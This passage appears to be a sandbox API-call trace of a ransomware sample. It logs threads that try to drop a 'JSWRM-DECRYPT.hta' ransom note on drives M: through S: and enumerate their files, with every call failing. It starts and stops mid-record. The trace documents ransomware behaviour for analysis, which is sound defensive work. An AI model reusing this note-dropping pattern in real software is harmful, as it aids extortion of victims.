(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.400] CreateFileW (lpFileName="M:\\JSWRM-DECRYPT.hta" (normalized: "m:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.400] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.400] WriteFile (in: hFile=0xffffffff, lpBuffer=0x40dc80c, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x40dc7d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x40dc7d8, lpOverlapped=0x0) returned 0 [0058.400] CloseHandle (hObject=0xffffffff) returned 1 [0058.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.400] FindFirstFileW (in: lpFileName="M:\\*.*", lpFindFileData=0x40df894 | out: lpFindFileData=0x40df894*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.400] GetCurrentThreadId () returned 0xd34 [0058.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a510 | out: hHeap=0x1e0000) returned 1 [0058.400] GetLastError () returned 0x3 [0058.400] SetLastError (dwErrCode=0x3) [0058.400] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229380 | out: hHeap=0x1e0000) returned 1 [0058.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 89 os_tid = 0xac8 [0058.408] GetLastError () returned 0x57 [0058.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.409] SetLastError (dwErrCode=0x57) [0058.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.413] GetFileAttributesW (lpFileName="N:\\JSWRM-DECRYPT.hta" (normalized: "n:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x421c364, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.417] CreateFileW (lpFileName="N:\\JSWRM-DECRYPT.hta" (normalized: "n:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.418] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.418] WriteFile (in: hFile=0xffffffff, lpBuffer=0x421c478, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x421c444, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x421c444, lpOverlapped=0x0) returned 0 [0058.418] CloseHandle (hObject=0xffffffff) returned 1 [0058.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.418] FindFirstFileW (in: lpFileName="N:\\*.*", lpFindFileData=0x421f500 | out: lpFindFileData=0x421f500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.418] GetCurrentThreadId () returned 0xac8 [0058.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a5a0 | out: hHeap=0x1e0000) returned 1 [0058.418] GetLastError () returned 0x3 [0058.418] SetLastError (dwErrCode=0x3) [0058.418] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x228fa0 | out: hHeap=0x1e0000) returned 1 [0058.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 90 os_tid = 0xe98 [0058.419] GetLastError () returned 0x57 [0058.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.419] SetLastError (dwErrCode=0x57) [0058.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.423] GetFileAttributesW (lpFileName="O:\\JSWRM-DECRYPT.hta" (normalized: "o:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x435c478, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.427] CreateFileW (lpFileName="O:\\JSWRM-DECRYPT.hta" (normalized: "o:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.428] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.428] WriteFile (in: hFile=0xffffffff, lpBuffer=0x435c58c, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x435c558, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x435c558, lpOverlapped=0x0) returned 0 [0058.428] CloseHandle (hObject=0xffffffff) returned 1 [0058.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.428] FindFirstFileW (in: lpFileName="O:\\*.*", lpFindFileData=0x435f614 | out: lpFindFileData=0x435f614*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.428] GetCurrentThreadId () returned 0xe98 [0058.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a618 | out: hHeap=0x1e0000) returned 1 [0058.428] GetLastError () returned 0x3 [0058.428] SetLastError (dwErrCode=0x3) [0058.428] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229680 | out: hHeap=0x1e0000) returned 1 [0058.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 91 os_tid = 0x7ec [0058.429] GetLastError () returned 0x57 [0058.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.429] SetLastError (dwErrCode=0x57) [0058.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.433] GetFileAttributesW (lpFileName="P:\\JSWRM-DECRYPT.hta" (normalized: "p:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x449c964, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.438] CreateFileW (lpFileName="P:\\JSWRM-DECRYPT.hta" (normalized: "p:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.438] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.438] WriteFile (in: hFile=0xffffffff, lpBuffer=0x449ca78, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x449ca44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x449ca44, lpOverlapped=0x0) returned 0 [0058.438] CloseHandle (hObject=0xffffffff) returned 1 [0058.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.438] FindFirstFileW (in: lpFileName="P:\\*.*", lpFindFileData=0x449fb00 | out: lpFindFileData=0x449fb00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.438] GetCurrentThreadId () returned 0x7ec [0058.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a630 | out: hHeap=0x1e0000) returned 1 [0058.438] GetLastError () returned 0x3 [0058.438] SetLastError (dwErrCode=0x3) [0058.438] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2296e0 | out: hHeap=0x1e0000) returned 1 [0058.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 92 os_tid = 0x1004 [0058.439] GetLastError () returned 0x57 [0058.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.439] SetLastError (dwErrCode=0x57) [0058.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.443] GetFileAttributesW (lpFileName="Q:\\JSWRM-DECRYPT.hta" (normalized: "q:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x45dc650, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.448] CreateFileW (lpFileName="Q:\\JSWRM-DECRYPT.hta" (normalized: "q:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.448] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.448] WriteFile (in: hFile=0xffffffff, lpBuffer=0x45dc764, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x45dc730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x45dc730, lpOverlapped=0x0) returned 0 [0058.448] CloseHandle (hObject=0xffffffff) returned 1 [0058.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.448] FindFirstFileW (in: lpFileName="Q:\\*.*", lpFindFileData=0x45df7ec | out: lpFindFileData=0x45df7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.448] GetCurrentThreadId () returned 0x1004 [0058.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a648 | out: hHeap=0x1e0000) returned 1 [0058.448] GetLastError () returned 0x3 [0058.448] SetLastError (dwErrCode=0x3) [0058.448] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229400 | out: hHeap=0x1e0000) returned 1 [0058.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 93 os_tid = 0x1008 [0058.449] GetLastError () returned 0x57 [0058.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.449] SetLastError (dwErrCode=0x57) [0058.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.453] GetFileAttributesW (lpFileName="R:\\JSWRM-DECRYPT.hta" (normalized: "r:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x471c930, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.457] CreateFileW (lpFileName="R:\\JSWRM-DECRYPT.hta" (normalized: "r:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.458] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.458] WriteFile (in: hFile=0xffffffff, lpBuffer=0x471ca44, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x471ca10, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x471ca10, lpOverlapped=0x0) returned 0 [0058.458] CloseHandle (hObject=0xffffffff) returned 1 [0058.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.458] FindFirstFileW (in: lpFileName="R:\\*.*", lpFindFileData=0x471facc | out: lpFindFileData=0x471facc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.458] GetCurrentThreadId () returned 0x1008 [0058.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a840 | out: hHeap=0x1e0000) returned 1 [0058.458] GetLastError () returned 0x3 [0058.458] SetLastError (dwErrCode=0x3) [0058.458] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2294c0 | out: hHeap=0x1e0000) returned 1 [0058.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 94 os_tid = 0x100c [0058.459] GetLastError () returned 0x57 [0058.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.459] SetLastError (dwErrCode=0x57) [0058.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.463] GetFileAttributesW (lpFileName="S:\\JSWRM-DECRYPT.hta" (normalized: "s:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x485c558, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.468] CreateFileW (lpFileName="S:\\JSWRM-DECRYPT.hta" (normalized: "s:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.468] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.468] WriteFile (in: hFile=0xffffffff, lpBuffer=0x485c66c, nNumberOfBytesToWrite=0x230c, 